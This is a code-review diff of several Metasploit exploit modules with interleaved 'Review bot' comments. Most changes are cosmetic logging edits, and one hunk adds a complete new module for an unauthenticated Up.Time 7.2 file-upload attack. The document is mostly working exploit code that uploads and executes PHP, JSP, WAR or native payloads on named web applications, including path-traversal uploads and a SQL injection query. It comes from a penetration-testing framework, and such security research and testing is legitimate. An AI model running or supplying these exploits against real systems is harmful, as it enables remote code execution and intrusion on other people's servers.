'data' => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root",
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/
dir = "#{base}#{$1}"
print_status("#{@peer} - Successfully retrieved writable subdirectory (#{$1})")
print_status("#{peer} - Successfully retrieved writable subdirectory (#{$1})")
else
dir = "#{base}"
print_error("#{@peer} - Could not find a writable subdirectory.")
print_error("#{peer} - Could not find a writable subdirectory.")
end
# upload PHP payload
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}")
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}")
php = %Q|<?php #{payload.encoded} ?>|
begin
res = upload(base, dir, @fname, php)
if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/
print_good("#{@peer} - File uploaded successfully")
print_good("#{peer} - File uploaded successfully")
else
fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
# search directories in the web root for the file
print_status("#{@peer} - Searching directories for file (#{@fname})")
print_status("#{peer} - Searching directories for file (#{@fname})")
begin
res = send_request_cgi({
'method' => 'POST',
@ -193,27 +193,27 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => datastore['COOKIE'],
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/
dir = $1.gsub('\\','')
print_good("#{@peer} - Successfully found file")
print_good("#{peer} - Successfully found file")
else
print_error("#{@peer} - Failed to find file")
print_error("#{peer} - Failed to find file")
end
# retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (/#{dir}/#{@fname})")
print_status("#{peer} - Executing payload (/#{dir}/#{@fname})")
begin
send_request_cgi({
'method' => 'GET',
'uri' => "/#{dir}/#{@fname}"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if res and res.code != 200
print_error("#{@peer} - Executing payload failed")
print_error("#{peer} - Executing payload failed")
end
end
end
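Review bot: The final check `if res and res.code != 200` never looks at the payload request: the `send_request_cgi` that fetches `/#{dir}/#{@fname}` discards its return value, so `res` still holds the response from the earlier file search (already required to be 200 for `dir` to be set), and the "Executing payload failed" branch cannot fire. Assign it, `res = send_request_cgi({ 'method' => 'GET', 'uri' => "/#{dir}/#{@fname}" })`, so the status check is meaningful. When that search fails the module also proceeds with `dir` still pointing at the writable directory found earlier, which may be intended as best-effort but deserves a comment. The `exploit` method begins before this section's first hunk.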


@ -124,38 +124,37 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
base = target_uri.path
@peer = "#{rhost}:#{rport}"
@fname= rand_text_alphanumeric(rand(10)+6) + '.php'
user = datastore['USERNAME']
pass = datastore['PASSWORD']
# login; get session id and token
print_status("#{@peer} - Authenticating as user '#{user}'")
print_status("#{peer} - Authenticating as user '#{user}'")
res = login(base, user, pass)
if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/
token = "#{$1}"
sid = "#{$2}"
print_good("#{@peer} - Authenticated successfully")
print_good("#{peer} - Authenticated successfully")
else
fail_with(Failure::NoAccess, "#{@peer} - Authentication failed")
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end
# upload PHP payload
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
php = %Q|<?php #{payload.encoded} ?>|
begin
res = upload(base, sid, @fname, php)
if res and res.code == 301 and res['location'] =~ /Setting saved/
print_good("#{@peer} - File uploaded successfully")
print_good("#{peer} - File uploaded successfully")
else
fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
# retrieve PHP file path
print_status("#{@peer} - Locating PHP payload file")
print_status("#{peer} - Locating PHP payload file")
begin
res = send_request_cgi({
'method' => 'GET',
@ -163,28 +162,28 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => "sid#{token}=#{sid}"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/
shell_uri = "#{$1}"
@fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)')
print_good("#{@peer} - Found payload file path (#{shell_uri})")
print_good("#{peer} - Found payload file path (#{shell_uri})")
else
fail_with(Failure::UnexpectedReply, "#{@peer} - Failed to find PHP payload file path")
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find PHP payload file path")
end
# retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (#{shell_uri})")
print_status("#{peer} - Executing payload (#{shell_uri})")
begin
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, shell_uri),
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
if !res or res.code != 200
fail_with(Failure::UnexpectedReply, "#{@peer} - Executing payload failed")
fail_with(Failure::UnexpectedReply, "#{peer} - Executing payload failed")
end
end
end
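Review bot: As in the sibling modules, the payload-execution request `send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, shell_uri) })` discards its response, so the following `if !res or res.code != 200` re-examines the "Locating PHP payload file" response and the `Failure::UnexpectedReply` after it can never trigger for the execution step; prefix the call with `res = ` to make the check real. Separately, `@fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)')` stores a MatchData, not a string; if `@fname` is later used to build a cleanup path (its consumer is outside this section), it presumably needs `[1]` or `.to_s`. The `exploit` method begins before this section's first hunk.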


@ -84,20 +84,19 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
# Create user with empty credentials
print_status("#{@peer} - Creating user with empty credentials")
print_status("#{peer} - Creating user with empty credentials")
if create_user.nil?
print_error("#{@peer} - Failed to create user")
print_error("#{peer} - Failed to create user")
return
end
# Generate an initial JSESSIONID
print_status("#{@peer} - Retrieving an initial JSESSIONID")
print_status("#{peer} - Retrieving an initial JSESSIONID")
res = send_request_cgi(
'uri' => normalize_uri(@uri, 'servlet/Main'),
'method' => 'POST'
@ -106,14 +105,14 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/
session_id = $1
else
print_error("#{@peer} - Retrieve of initial JSESSIONID failed")
print_error("#{peer} - Retrieve of initial JSESSIONID failed")
return
end
# Authenticate
login_data = "j_username=&j_password="
print_status("#{@peer} - Authenticating on HP SiteScope Configuration")
print_status("#{peer} - Authenticating on HP SiteScope Configuration")
res = send_request_cgi(
{
'uri' => normalize_uri(@uri, 'j_security_check'),
@ -130,12 +129,12 @@ class Metasploit3 < Msf::Exploit::Remote
session_id = $1
redirect = URI(res.headers['Location']).path
else
print_error("#{@peer} - Authentication on SiteScope failed")
print_error("#{peer} - Authentication on SiteScope failed")
return
end
# Follow redirection to complete authentication process
print_status("#{@peer} - Following redirection to finish authentication")
print_status("#{peer} - Following redirection to finish authentication")
res = send_request_cgi(
{
'uri' => redirect,
@ -147,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 200
print_error("#{@peer} - Authentication on SiteScope failed")
print_error("#{peer} - Authentication on SiteScope failed")
return
end
@ -235,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
traversal = "..\\..\\..\\..\\..\\..\\"
end
print_status("#{@peer} - Uploading the payload")
print_status("#{peer} - Uploading the payload")
res = send_request_cgi(
{
'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@var_hexfile}.txt&UploadFilesHandler.ovveride=true",
@ -250,16 +249,16 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
path = $1
print_good("#{@peer} - Payload successfully uploaded to #{path}")
print_good("#{peer} - Payload successfully uploaded to #{path}")
else
print_error("#{@peer} - Error uploading the Payload")
print_error("#{peer} - Error uploading the Payload")
return
end
post_data = Rex::MIME::Message.new
post_data.add_part(jspraw, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{rand_text_alpha(4)}.png\"")
print_status("#{@peer} - Uploading the JSP")
print_status("#{peer} - Uploading the JSP")
res = send_request_cgi(
{
'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
@ -274,9 +273,9 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/
path = $1
print_good("#{@peer} - JSP successfully uploaded to #{path}")
print_good("#{peer} - JSP successfully uploaded to #{path}")
else
print_error("#{@peer} - Error uploading the JSP")
print_error("#{peer} - Error uploading the JSP")
return
end


@ -101,32 +101,31 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
base = target_uri.path
@peer = "#{rhost}:#{rport}"
@fname = rand_text_numeric(7)
# upload PHP payload to userpictures/[fname].php
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
php = %Q|<?php #{payload.encoded} ?>|
begin
res = upload(base, php)
if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/
print_good("#{@peer} - File uploaded successfully")
print_good("#{peer} - File uploaded successfully")
else
fail_with(Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
# retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (userpictures/#{@fname}.php)")
print_status("#{peer} - Executing payload (userpictures/#{@fname}.php)")
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, 'userpictures', "#{@fname}.php")
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
end


@ -72,8 +72,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@peer = "#{rhost}:#{rport}"
#
# Init target path
#
@ -89,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
# Upload payload
#
print_status("#{@peer} - Uploading payload")
print_status("#{peer} - Uploading payload")
res = send_request_cgi({
'uri' => normalize_uri(base, "/includes/savepage.php"),
'vars_get' => {
@ -99,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res
print_error("#{@peer} - No response from server, will not continue.")
print_error("#{peer} - No response from server, will not continue.")
return
end
#
# Run payload
#
print_status("#{@peer} - Requesting '#{php_fname}'")
print_status("#{peer} - Requesting '#{php_fname}'")
send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) })
handler


@ -69,9 +69,8 @@ class Metasploit4 < Msf::Exploit::Remote
end
def check
@peer = "#{rhost}:#{rport}"
fingerprint = rand_text_alpha(5)
print_status("#{@peer} - Sending check...")
print_status("#{peer} - Sending check...")
begin
res = http_send_raw(fingerprint)
rescue Rex::ConnectionError
@ -91,8 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Sending payload...")
print_status("#{peer} - Sending payload...")
http_send_cmd(payload.encoded)
end


@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
# If we don't get a cookie, bail!
if res and res.headers['Set-Cookie'] =~ /(PHPVolunteerManagent=\w+);*/
cookie = $1
vprint_status("#{@peer} - Found cookie: #{cookie}")
vprint_status("#{peer} - Found cookie: #{cookie}")
else
return nil
end
@ -189,56 +189,54 @@ class Metasploit3 < Msf::Exploit::Remote
base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
# Login
username = datastore['USERNAME']
password = datastore['PASSWORD']
cookie = login(base, username, password)
if cookie.nil?
print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
return
end
print_status("#{@peer} - Login successful with #{username}:#{password}")
print_status("#{peer} - Login successful with #{username}:#{password}")
# Take a snapshot of the uploads directory
# Viewing this doesn't actually require the user to login first,
# but we supply the cookie anyway to act more like a real user.
print_status("#{@peer} - Enumerating all the uploads...")
print_status("#{peer} - Enumerating all the uploads...")
before = peek_uploads(base, cookie)
if before.nil?
print_error("#{@peer} - Unable to enumerate original uploads")
print_error("#{peer} - Unable to enumerate original uploads")
return
end
# Upload our PHP shell
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
fname = rand_text_alpha(rand(10)+6) + '.php'
desc = rand_text_alpha(rand(10)+5)
php = %Q|<?php #{payload.encoded} ?>|
res = upload(base, cookie, fname, php, desc)
if res.nil? or res.body !~ /The file was successfuly uploaded/
print_error("#{@peer} - Failed to upload our file")
print_error("#{peer} - Failed to upload our file")
return
end
# Now that we've uploaded our shell, let's take another snapshot
# of the uploads directory.
print_status("#{@peer} - Enumerating new uploads...")
print_status("#{peer} - Enumerating new uploads...")
after = peek_uploads(base, cookie)
if after.nil?
print_error("#{@peer} - Unable to enumerate latest uploads")
print_error("#{peer} - Unable to enumerate latest uploads")
return
end
# Find the filename of our uploaded shell
files = get_my_file(before.body, after.body)
if files.empty?
print_error("#{@peer} - No new file(s) found. The upload probably failed.")
print_error("#{peer} - No new file(s) found. The upload probably failed.")
return
else
vprint_status("#{@peer} - Found these new files: #{files.inspect}")
vprint_status("#{peer} - Found these new files: #{files.inspect}")
end
# There might be more than 1 new file, at least execute the first 10
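Review bot: Both the failure and success messages around `login` print the password in clear (`"Login successful with #{username}:#{password}"`), so the credential ends up in the console, spool files and any logged output; printing only the username, `print_status("#{peer} - Login successful as #{username}")`, gives the same diagnostic value without the leak. The same pattern appears in the other modules of this commit and would be worth fixing consistently. The `exploit` method begins before this section's hunk and continues after it.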


@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
@clean_files.each do |f|
print_warning("#{@peer} - Removing: #{f}")
print_warning("#{peer} - Removing: #{f}")
begin
if cli.type == 'meterpreter'
cli.fs.file.rm(f)
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
cli.shell_command_token("rm #{f}")
end
rescue ::Exception => e
print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
print_error("#{peer} - Unable to remove #{f}: #{e.message}")
end
end
end
@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]
# Get user data
vprint_status("#{@peer} - Enumerating user data")
vprint_status("#{peer} - Enumerating user data")
res = send_request_raw({
'uri' => "#{base}/index.php/home/myAccount",
'cookie' => cookie
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
return {} if not res
if res.code == 404
print_error("#{@peer} - #{username} does not actually have a 'myAccount' page")
print_error("#{peer} - #{username} does not actually have a 'myAccount' page")
return {}
end
@ -208,35 +208,33 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res
print_error("#{@peer} - Unable to request the file")
print_error("#{peer} - Unable to request the file")
return
end
fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || ''
if fname.empty?
print_error("#{@peer} - Unable to extract the real filename")
print_error("#{peer} - Unable to extract the real filename")
return
end
# Now that we have the filename, request it
print_status("#{@peer} - Uploaded file was renmaed as '#{fname}'")
print_status("#{peer} - Uploaded file was renmaed as '#{fname}'")
send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"})
handler
end
def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
user = datastore['USERNAME']
pass = datastore['PASSWORD']
print_status("#{@peer} - Attempt to login with '#{user}:#{pass}'")
print_status("#{peer} - Attempt to login with '#{user}:#{pass}'")
opts = login(base, user, pass)
if opts.empty?
print_error("#{@peer} - Login unsuccessful")
print_error("#{peer} - Login unsuccessful")
return
end
@ -253,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote
p = get_write_exec_payload("/tmp/#{bin_name}", bin)
end
print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
opts = opts.merge({
'username' => user.scan(/^(.+)\@.+/).flatten[0] || '',
'email' => user,
@ -262,11 +260,11 @@ class Metasploit3 < Msf::Exploit::Remote
})
uploader = upload_php(base, opts)
if not uploader
print_error("#{@peer} - Unable to upload")
print_error("#{peer} - Unable to upload")
return
end
print_status("#{@peer} - Executing '#{php_fname}'")
print_status("#{peer} - Executing '#{php_fname}'")
exec_php(base, opts)
end
end
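Review bot: The cleanup loop rescues `::Exception => e`, which also catches `Interrupt` and `SystemExit` while files are being removed over the session; `rescue ::StandardError => e` keeps the best-effort behaviour for failed `rm` calls without trapping signals. The status message "Uploaded file was renmaed as" should read "renamed". The cleanup method enclosing the first hunk and `login` enclosing the second both begin before this section.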


@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
post_data = data.to_s
post_data = post_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}/admin/manage.php",
@ -122,15 +122,15 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res
print_error("#{@peer} - No response from host")
print_error("#{peer} - No response from host")
return
end
target_path = "#{base}/blogs/download/uploads/#{php_fname}"
print_status("#{@peer} - Requesting '#{target_path}'...")
print_status("#{peer} - Requesting '#{target_path}'...")
res = send_request_raw({'uri'=>target_path})
if res and res.code == 404
print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}")
return
end
@ -139,17 +139,15 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
print_status("#{@peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
print_status("#{peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
cookie = do_login(base)
if cookie.empty?
print_error("#{@peer} - Unable to login")
print_error("#{peer} - Unable to login")
return
end


@ -159,16 +159,14 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@peer = "#{rhost}:#{rport}"
# Get Tomcat installation path
print_status("#{@peer} - Retrieving Tomcat installation path...")
print_status("#{peer} - Retrieving Tomcat installation path...")
if install_path.nil?
fail_with(Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
fail_with(Failure::NotVulnerable, "#{peer} - Unable to retrieve the Tomcat installation path")
end
print_good("#{@peer} - Tomcat installed on #{install_path}")
print_good("#{peer} - Tomcat installed on #{install_path}")
if target['Platform'] == "java"
exploit_java
@ -178,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit_java
print_status("#{@peer} - Uploading WAR file")
print_status("#{peer} - Uploading WAR file")
app_base = rand_text_alphanumeric(4+rand(32-4))
war = payload.encoded_war({ :app_name => app_base }).to_s
@ -195,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{@peer} - Attempting to launch payload in deployed WAR...")
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
@ -209,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit_native
print_status("#{@peer} - Uploading executable file")
print_status("#{peer} - Uploading executable file")
exe = payload.encoded_exe
exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8))
if target['Platform'] == "win"


@ -152,34 +152,34 @@ class Metasploit3 < Msf::Exploit::Remote
base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
datastore['COOKIE'] = "PHPSESSID="+rand_text_alpha_lower(26)+";"
# register an account
user = rand_text_alphanumeric(rand(10)+6)
print_status("#{@peer} - Registering user (#{user})")
print_status("#{peer} - Registering user (#{user})")
res = register(base, user, user)
if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
print_status("#{@peer} - Registered successfully")
print_status("#{peer} - Registered successfully")
else
print_error("#{@peer} - Registration failed")
print_error("#{peer} - Registration failed")
return
end
# login
print_status("#{@peer} - Authenticating user (#{user})")
print_status("#{peer} - Authenticating user (#{user})")
res = login(base, user, user)
if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
print_status("#{@peer} - Authenticated successfully")
print_status("#{peer} - Authenticated successfully")
else
print_error("#{@peer} - Authentication failed")
print_error("#{peer} - Authentication failed")
return
end
# set id and table name
id = rand(1000)+1
table = 'nodes_hierarchy'
print_status("#{@peer} - Setting id (#{id}) and table name (#{table})")
print_status("#{peer} - Setting id (#{id}) and table name (#{table})")
begin
res = send_request_cgi({
'method' => 'GET',
@ -187,35 +187,35 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => datastore['COOKIE'],
})
if res and res.code == 200
print_status("#{@peer} - Setting id and table name successfully")
print_status("#{peer} - Setting id and table name successfully")
else
print_error("#{@peer} - Setting id and table name failed")
print_error("#{peer} - Setting id and table name failed")
return
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
return
end
# upload PHP payload to ./upload_area/nodes_hierarchy/[id]/
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
fname = rand_text_alphanumeric(rand(10)+6) + '.php'
php = %Q|<?php #{payload.encoded} ?>|
begin
res = upload(base, fname, php)
if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/
print_good("#{@peer} - File uploaded successfully")
print_good("#{peer} - File uploaded successfully")
else
print_error("#{@peer} - Uploading PHP payload failed")
print_error("#{peer} - Uploading PHP payload failed")
return
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
return
end
# attempt to retrieve real file name from directory index
print_status("#{@peer} - Retrieving real file name from directory index.")
print_status("#{peer} - Retrieving real file name from directory index.")
begin
res = send_request_cgi({
'method' => 'GET',
@ -223,19 +223,19 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@token = $1
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
print_good("#{peer} - Successfully retrieved file name (#{@token})")
else
print_error("#{@peer} - Could not retrieve file name from directory index.")
print_error("#{peer} - Could not retrieve file name from directory index.")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
return
end
# attempt to retrieve real file name from the database
if @token.nil?
print_status("#{@peer} - Retrieving real file name from the database.")
print_status("#{peer} - Retrieving real file name from the database.")
sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
begin
res = send_request_cgi({
@ -245,26 +245,26 @@ class Metasploit3 < Msf::Exploit::Remote
})
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@token = $1
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
print_good("#{peer} - Successfully retrieved file name (#{@token})")
else
print_error("#{@peer} - Could not retrieve file name from the database.")
print_error("#{peer} - Could not retrieve file name from the database.")
return
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
return
end
end
# retrieve and execute PHP payload
print_status("#{@peer} - Executing payload (#{@token}.php)")
print_status("#{peer} - Executing payload (#{@token}.php)")
begin
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php")
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
print_error("#{peer} - Connection failed")
return
end


@ -0,0 +1,99 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Up.Time Monitoring Station post2file.php Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability found within the Up.Time
monitoring server 7.2 and below. A malicious entity can upload a PHP file into the
webroot without authentication, leading to arbitrary code execution.
},
'Author' =>
[
'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '100423' ],
[ 'BID', '64031'],
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ]
],
'Payload' =>
{
'Space' => 10000, # just a big enough number to fit any PHP payload
'DisableNops' => true
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Up.Time 7.2', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 19 2013'))
register_options([
OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),
Opt::RPORT(9999)
], self.class)
end
def check
uri = target_uri.path
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php')
})
if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Uploading PHP to Up.Time server")
uri = target_uri.path
@payload_name = "#{rand_text_alpha(5)}.php"
php_payload = get_write_exec_payload(:unlink_self => true)
post_data = ({
"file_name" => @payload_name,
"script" => php_payload
})
print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php'),
'vars_post' => post_data,
})
unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_cgi({
'uri' => normalize_uri(uri, 'wizards', @payload_name),
'method' => 'GET'
})
end
end
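Review bot: The result of the final GET in `exploit` (`res = send_request_cgi({ 'uri' => normalize_uri(uri, 'wizards', @payload_name), ... })`) is assigned but never inspected, so a non-200 reply or no reply at all is silently ignored and the file named by `@payload_name` is left in the webroot whenever the `:unlink_self` payload never runs. Check `res` and report with `print_error` when it is nil or not 200, and consider including `Msf::Exploit::FileDropper` and calling `register_files_for_cleanup(@payload_name)` right after the upload succeeds so the file is removed even if execution fails. `check` returns `Appears` on a 500 whose body has an empty `<title>`, which is a weak fingerprint; a comment such as `# post2file.php answers 500 with an empty <title> when POSTed without parameters` would document why that is taken as a positive signal. Minor: `discoverey` in the author line should read `discovery`.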


